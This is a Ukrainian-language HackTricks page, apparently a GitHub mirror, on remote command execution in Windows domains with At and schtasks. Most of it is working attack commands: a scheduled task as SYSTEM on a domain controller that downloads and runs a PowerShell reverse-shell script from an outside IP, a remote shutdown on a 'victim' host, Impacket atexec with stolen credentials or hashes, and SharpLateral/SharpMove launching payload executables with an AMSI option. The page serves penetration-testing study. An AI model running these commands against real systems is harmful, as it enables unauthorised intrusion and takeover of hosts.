mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
2.2 KiB
2.2 KiB
AtExec / SchtasksExec
{{#include ../../banners/hacktricks-training.md}}
Як це працює
At дозволяє планувати завдання на хостах, де ви знаєте ім'я користувача/(пароль/хеш). Отже, ви можете використовувати його для виконання команд на інших хостах і отримання виходу.
At \\victim 11:00:00PM shutdown -r
Використовуючи schtasks, спочатку потрібно створити задачу, а потім викликати її:
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
Ви можете використовувати Impacket's atexec.py
для виконання команд на віддалених системах за допомогою команди AT. Це вимагає дійсних облікових даних (ім'я користувача та пароль або хеш) для цільової системи.
atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami
Ви також можете використовувати SharpLateral:
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
Ви можете використовувати SharpMove:
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
Більше інформації про використання schtasks з silver tickets тут.
{{#include ../../banners/hacktricks-training.md}}